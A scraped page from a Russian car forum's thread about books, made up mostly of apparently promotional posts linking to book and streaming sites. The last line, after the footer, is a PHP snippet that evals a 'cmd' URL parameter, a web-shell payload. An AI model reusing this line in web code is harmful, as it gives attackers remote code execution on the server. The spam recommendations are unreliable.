+ Ответить в теме
Страница 2 из 2 ПерваяПервая 1 2
Показано с 11 по 16 из 16

Тема: Книги


  1. #11
    Мимо проходил Степуха is on a distinguished road Аватар для Степуха
    Регистрация
    09.02.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    48
    Привет, если вам нужен большой выбор обзоров, то попробуйте обратить внимание на сервис https://flibusta.club ,вариант просто замечательный, меня устраивает во всем. Очень интересно читать такие книги.

  2. #12
    GTI-Racing Maxxxx is on a distinguished road Аватар для Maxxxx
    Регистрация
    08.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    383
    а где можно глянуть книги для ребенка, которые помогут в обучении?

  3. #13
    Новичок Rusik23 is on a distinguished road Аватар для Rusik23
    Регистрация
    25.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    179
    Цитата Сообщение от Maxxxx Посмотреть сообщение
    а где можно глянуть книги для ребенка, которые помогут в обучении?
    Я подбирал сыну нужные книги, которые помогут с обучением. В этом вопросе на помощь пришло издательство РООССА. У них большой выбор книг. Я приобрел толковый словарь живого великорусского языка, составленный Владимиром Ивановичем Далем. Стоимость составила 780 рублей, доставка оперативная. На сайте https://roossa.ru/product-category/child/ заказывал книгу и получил качественное обслуживание. Собираюсь приобретать книги на постоянной основе.

  4. #14
    Мимо проходил Gheri is on a distinguished road Аватар для Gheri
    Регистрация
    26.04.2021
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    34
    Как же приятно видеть, что сейчас среди нас есть так много читающих людей. Мое сердце радуется такому :) Думаю, что вы можете зайти на avidreaders , это мой вам дружеский совет. Там содержится множество самых интересных литературных произведений, все из которых вы без труда скачаете себе на мобильный телефон, или на компьютер. Я таким образом прочел уже десятки книг, ребята! Всем советую ;)

  5. #15
    Мимо проходил alsha2 is on a distinguished road Аватар для alsha2
    Регистрация
    13.10.2021
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    2
    Цитата Сообщение от Markov Посмотреть сообщение
    Здравствуйте, как бы не хотелось мне помочь, ничего не могу вам подсказать. Я наоборот люблю какие-нибудь детективы, от которых кровь стынет. Но сейчас в интернете все есть и книги и отзывы на них. Поищите, может найдете.
    Hola, bienvenido a Doramasmp4.me. Aquí puedes ver todos los dramas españoles en alta calidad de video. Mire hoy Ni Chang Capítulo 19 sub video en español aquí en línea. Siga viendo Ver Doramas en línea, así como Dormas Sub Español, aquí mismo.
    https://doramasmp4.me/movies/the-witch-part-1-the-subversion/

  6. #16
    Мимо проходил Anton Vlasov is on a distinguished road Аватар для Anton Vlasov
    Регистрация
    11.03.2020
    Откуда
    Москва
    Машина
    Киа
    Сообщений
    28
    Художественную литературу найти не сложно сейчас, чего не скажешь о научной, образовательной и технической. Я столкнулся с этим недавно, когда подыскивал брату учебники для подготовки к поступлению. К счастью, всё же сумел найти здесь https://www.legionr.ru/catalog/ege/s.../year-is-2022/ актуальные пособия егэ по математике 2022 года. Тем, кому также нужны учебники и пособия для поступления и учебы, рекомендую посетить этот интернет магазин. Выбор у них отличный и цены доступные.

+ Ответить в теме
Страница 2 из 2 ПерваяПервая 1 2

Похожие темы

  1. христианские книги
    от kiris в разделе Семья и дом
    Ответов: 4
    Последнее сообщение: 22.06.2020, 21:01
  2. Книги И Программы По Ремонту И Обслуживанию Vw
    от leshik25 в разделе Ремонт и обслуживание
    Ответов: 0
    Последнее сообщение: 17.01.2009, 05:50
  3. Ответов: 0
    Последнее сообщение: 12.12.2008, 22:06

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}